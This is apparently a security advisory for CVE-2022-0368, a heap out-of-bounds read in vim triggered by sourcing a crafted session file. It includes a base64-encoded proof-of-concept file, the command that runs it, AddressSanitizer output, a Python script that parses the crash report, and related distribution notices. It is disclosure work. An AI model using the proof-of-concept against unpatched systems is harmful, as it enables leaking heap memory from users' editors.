Headline
CVE-2022-0368: Out-of-bounds Read in vim
Out-of-bounds Read in GitHub repository vim/vim prior to 8.2.
Description
A heap-based out-of-bounds read of size 4 occurs when a user sources the Vim session file given below (via -S). It happens regardless of any command line options meant to restrict Vim, such as -Z (restricted mode) and -m (modifications not allowed). The bug was found on a default Vim build (latest commit hash 8e4af851fd3eff4b22fca962e5be783742e8f1bb at the time of testing) on Ubuntu 20.04 for x86_64/amd64.
Proof of Concept
Here is the smallest PoC we were able to produce (it is base64 encoded since it contains some unprintable characters; it is also fairly large, but we have not been able to minimize it further):
$ echo -ne "ZGVGEDAw7sow////f5kwMDAwMDAwMDAwMDAwMDAKICBkZWYwMDAwMDAwMDAwMDAwMDAwMDAwMDDe
AAojf+QwMDAwMDAwlo0wMDAwMDAwMDAwMApbCiBzaWwhbm9ybTBlZW5kcyBzaWwhbm9ybTBSHirt
kTB7DS8vA1ZubyAgbm9yCjB1CnN1ISowMDAwMDAwCnNpbCFub3JthyogKiBub3Iwbm+Nks+KZHN1
ISosKgtub35tMHUJc2n/AApzaQAKICBkZWYgU2Vjb25kRnVuY3RpwTAwMDAwMDAwMDAwMDCsMDAw
KDAJMDAwMDAwMDAwMDAwMDAwMDAwMDAwCm4=" | base64 -d > poc
$ vim -u NONE -i NONE -n -X -Z -e -m -s -S poc -c ':qa!'
=================================================================
==52803==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000085b1 at pc 0x7f76508e5f40 bp 0x7ffe59bfb120 sp 0x7ffe59bfa8c8
READ of size 4 at 0x6020000085b1 thread T0
#0 0x7f76508e5f3f in __interceptor_memmove (/lib/x86_64-linux-gnu/libasan.so.5+0xa0f3f)
#1 0x55b8deba6cce in ml_flush_line /home/faraday/vim/src/memline.c:4028
#2 0x55b8deba0811 in ml_append_flush /home/faraday/vim/src/memline.c:3313
#3 0x55b8deba0a6c in ml_append_flags /home/faraday/vim/src/memline.c:3358
#4 0x55b8deba0956 in ml_append /home/faraday/vim/src/memline.c:3345
#5 0x55b8de739794 in open_line /home/faraday/vim/src/change.c:2139
#6 0x55b8dec75acf in n_opencmd /home/faraday/vim/src/normal.c:6528
#7 0x55b8dec8320e in nv_open /home/faraday/vim/src/normal.c:7664
#8 0x55b8dec3ab1f in normal_cmd /home/faraday/vim/src/normal.c:1120
#9 0x55b8de9972ac in exec_normal /home/faraday/vim/src/ex_docmd.c:8629
#10 0x55b8de99706b in exec_normal_cmd /home/faraday/vim/src/ex_docmd.c:8592
#11 0x55b8de996589 in ex_normal /home/faraday/vim/src/ex_docmd.c:8510
#12 0x55b8de958aa4 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2567
#13 0x55b8de94c42d in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
#14 0x55b8deec9c2f in do_source /home/faraday/vim/src/scriptfile.c:1512
#15 0x55b8deec6c0c in cmd_source /home/faraday/vim/src/scriptfile.c:1098
#16 0x55b8deec6dc9 in ex_source /home/faraday/vim/src/scriptfile.c:1124
#17 0x55b8de958aa4 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2567
#18 0x55b8de94c42d in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
#19 0x55b8de949fa7 in do_cmdline_cmd /home/faraday/vim/src/ex_docmd.c:587
#20 0x55b8df446dc9 in exe_commands /home/faraday/vim/src/main.c:3091
#21 0x55b8df4388bf in vim_main2 /home/faraday/vim/src/main.c:774
#22 0x55b8df437da5 in main /home/faraday/vim/src/main.c:426
#23 0x7f764ee940b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
#24 0x55b8de6c0cbd in _start (/home/faraday/vim/src/vim+0x125ccbd)
0x6020000085b1 is located 0 bytes to the right of 1-byte region [0x6020000085b0,0x6020000085b1)
allocated by thread T0 here:
#0 0x7f7650952bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
#1 0x55b8de6c117e in lalloc /home/faraday/vim/src/alloc.c:248
#2 0x55b8de6c0f29 in alloc /home/faraday/vim/src/alloc.c:151
#3 0x55b8de6c13c2 in vim_memsave /home/faraday/vim/src/alloc.c:601
#4 0x55b8deba0ce3 in ml_replace_len /home/faraday/vim/src/memline.c:3435
#5 0x55b8df128fec in u_undoredo /home/faraday/vim/src/undo.c:2811
#6 0x55b8df1262cb in undo_time /home/faraday/vim/src/undo.c:2563
#7 0x55b8de991611 in ex_undo /home/faraday/vim/src/ex_docmd.c:7979
#8 0x55b8de958aa4 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2567
#9 0x55b8de94c42d in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
#10 0x55b8deec9c2f in do_source /home/faraday/vim/src/scriptfile.c:1512
#11 0x55b8deec6c0c in cmd_source /home/faraday/vim/src/scriptfile.c:1098
#12 0x55b8deec6dc9 in ex_source /home/faraday/vim/src/scriptfile.c:1124
#13 0x55b8de958aa4 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2567
#14 0x55b8de94c42d in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
#15 0x55b8de949fa7 in do_cmdline_cmd /home/faraday/vim/src/ex_docmd.c:587
#16 0x55b8df446dc9 in exe_commands /home/faraday/vim/src/main.c:3091
#17 0x55b8df4388bf in vim_main2 /home/faraday/vim/src/main.c:774
#18 0x55b8df437da5 in main /home/faraday/vim/src/main.c:426
#19 0x7f764ee940b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/lib/x86_64-linux-gnu/libasan.so.5+0xa0f3f) in __interceptor_memmove
Shadow bytes around the buggy address:
0x0c047fff9060: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9070: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
0x0c047fff9080: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9090: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff90a0: fa fa fd fa fa fa fd fa fa fa 03 fa fa fa 00 05
=>0x0c047fff90b0: fa fa fd fa fa fa[01]fa fa fa 01 fa fa fa fd fd
0x0c047fff90c0: fa fa 00 01 fa fa fd fa fa fa fd fd fa fa 01 fa
0x0c047fff90d0: fa fa 00 03 fa fa 01 fa fa fa fd fa fa fa fd fa
0x0c047fff90e0: fa fa fd fa fa fa fd fa fa fa fd fd fa fa 00 01
0x0c047fff90f0: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fa
0x0c047fff9100: fa fa 02 fa fa fa 00 01 fa fa fd fa fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==52803==ABORTING
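The report above already contains what a triager needs: the access kind and size, the size of the region it overruns, the first frame outside the sanitizer runtime, and the allocation site. The following parser is an added example (not part of the Faraday advisory and not vim's code) that extracts those fields and computes how many bytes the access runs past the allocation. The sample input is a trimmed copy of the report above; the set of allocation wrappers to skip (lalloc, alloc, vim_memsave) is an assumption taken from the allocation stack shown there.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the first lines of the AddressSanitizer report above,
# trimmed to the parts the parser needs.
SAMPLE_REPORT = """\
==52803==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000085b1 at pc 0x7f76508e5f40 bp 0x7ffe59bfb120 sp 0x7ffe59bfa8c8
READ of size 4 at 0x6020000085b1 thread T0
    #0 0x7f76508e5f3f in __interceptor_memmove (/lib/x86_64-linux-gnu/libasan.so.5+0xa0f3f)
    #1 0x55b8deba6cce in ml_flush_line /home/faraday/vim/src/memline.c:4028
    #2 0x55b8deba0811 in ml_append_flush /home/faraday/vim/src/memline.c:3313
0x6020000085b1 is located 0 bytes to the right of 1-byte region [0x6020000085b0,0x6020000085b1)
allocated by thread T0 here:
    #0 0x7f7650952bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
    #1 0x55b8de6c117e in lalloc /home/faraday/vim/src/alloc.c:248
    #2 0x55b8de6c0f29 in alloc /home/faraday/vim/src/alloc.c:151
    #3 0x55b8de6c13c2 in vim_memsave /home/faraday/vim/src/alloc.c:601
    #4 0x55b8deba0ce3 in ml_replace_len /home/faraday/vim/src/memline.c:3435
SUMMARY: AddressSanitizer: heap-buffer-overflow (/lib/x86_64-linux-gnu/libasan.so.5+0xa0f3f) in __interceptor_memmove
"""

# Assumption: vim's thin allocation wrappers as they appear in the stack above;
# skipping them yields the frame that actually decided the allocation size.
VIM_ALLOC_WRAPPERS = frozenset({"lalloc", "alloc", "vim_memsave"})

ERROR_RE = re.compile(r"ERROR: AddressSanitizer: (\S+) on address (0x[0-9a-fA-F]+)")
ACCESS_RE = re.compile(r"^(READ|WRITE) of size (\d+) at (0x[0-9a-fA-F]+)")
REGION_RE = re.compile(
    r"is located (\d+) bytes (to the right of|to the left of|inside of) "
    r"(\d+)-byte region \[(0x[0-9a-fA-F]+),(0x[0-9a-fA-F]+)\)")
FRAME_RE = re.compile(r"^\s*#(\d+)\s+0x[0-9a-fA-F]+\s+in\s+(\S+)\s+(\S+)")


@dataclass
class Frame:
    index: int
    func: str
    location: str  # "path:line" when symbolised, "(lib+offset)" otherwise

    @property
    def in_source(self) -> bool:
        # Library frames (libasan interceptors, libc) are shown as "(lib+off)".
        return not self.location.startswith("(") and ":" in self.location


@dataclass
class AsanReport:
    kind: str
    access: str
    size: int
    addr: int
    region_start: int
    region_end: int
    access_stack: list = field(default_factory=list)
    alloc_stack: list = field(default_factory=list)
    free_stack: list = field(default_factory=list)

    @property
    def bytes_past_end(self) -> int:
        # How far the access runs beyond the allocation; 0 if it stays inside.
        return max(0, self.addr + self.size - self.region_end)

    @staticmethod
    def first_source_frame(stack, skip=frozenset()):
        for f in stack:
            if f.in_source and f.func not in skip:
                return f
        return None


def parse_asan_report(text: str) -> AsanReport:
    kind = access = None
    size = addr = region_start = region_end = 0
    access_stack, alloc_stack, free_stack = [], [], []
    current = access_stack
    for line in text.splitlines():
        if m := ERROR_RE.search(line):
            kind = m.group(1)
        elif m := ACCESS_RE.match(line.strip()):
            access, size, addr = m.group(1), int(m.group(2)), int(m.group(3), 16)
            current = access_stack
        elif m := REGION_RE.search(line):
            region_start, region_end = int(m.group(4), 16), int(m.group(5), 16)
        elif "allocated by thread" in line:
            current = alloc_stack
        elif "freed by thread" in line:
            current = free_stack
        elif m := FRAME_RE.match(line):
            current.append(Frame(int(m.group(1)), m.group(2), m.group(3)))
    if kind is None or access is None:
        raise ValueError("not an AddressSanitizer memory-access report")
    return AsanReport(kind, access, size, addr, region_start, region_end,
                      access_stack, alloc_stack, free_stack)


def triage(report: AsanReport, alloc_wrappers=frozenset()) -> dict:
    crash = report.first_source_frame(report.access_stack)
    alloc = report.first_source_frame(report.alloc_stack, alloc_wrappers)
    impact = ("out-of-bounds read: adjacent heap bytes may be disclosed"
              if report.access == "READ" else
              "out-of-bounds write: neighbouring heap objects may be corrupted")
    return {
        "kind": report.kind,
        "access": f"{report.access} of {report.size} bytes",
        "region_size": report.region_end - report.region_start,
        "bytes_past_end": report.bytes_past_end,
        "crash_site": f"{crash.func} at {crash.location}" if crash else None,
        "alloc_site": f"{alloc.func} at {alloc.location}" if alloc else None,
        "impact": impact,
    }


if __name__ == "__main__":
    for k, v in triage(parse_asan_report(SAMPLE_REPORT), VIM_ALLOC_WRAPPERS).items():
        print(f"{k}: {v}")
```

On the report above this yields a 4-byte READ starting exactly at the end of a 1-byte region (4 bytes past the end), the faulting memmove in ml_flush_line (memline.c:4028), and the undersized allocation made by ml_replace_len (memline.c:3435) during undo, which is the pair of sites a fix has to reconcile.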
Impact
This vulnerability is capable of disclosing data (the read runs 4 bytes past a 1-byte heap allocation, so adjacent heap contents can be leaked) and might be used to bypass protection mechanisms, facilitating successful exploitation of other memory corruption vulnerabilities that may lead to code execution.
Acknowledgements
This bug was found by Octavio Gianatiempo ([email protected]) and Octavio Galland ([email protected]) from Faraday Research Team.
Related news
Ubuntu Security Notice 6026-1 - It was discovered that Vim was incorrectly processing Vim buffers. An attacker could possibly use this issue to perform illegal memory access and expose sensitive information. This issue only affected Ubuntu 20.04 LTS. It was discovered that Vim was using freed memory when dealing with regular expressions inside a visual selection. If a user were tricked into opening a specially crafted file, an attacker could crash the application, leading to a denial of service, or possibly achieve code execution with user privileges. This issue only affected Ubuntu 14.04 ESM, Ubuntu 18.04 LTS and Ubuntu 20.04 LTS.
Gentoo Linux Security Advisory 202208-32 - Multiple vulnerabilities have been discovered in Vim, the worst of which could result in denial of service. Versions less than 9.0.0060 are affected.
Ubuntu Security Notice 5458-1 - It was discovered that Vim was incorrectly handling virtual column position operations, which could result in an out-of-bounds read. An attacker could possibly use this issue to expose sensitive information. It was discovered that Vim was not properly performing bounds checks when updating windows present on a screen, which could result in a heap buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code.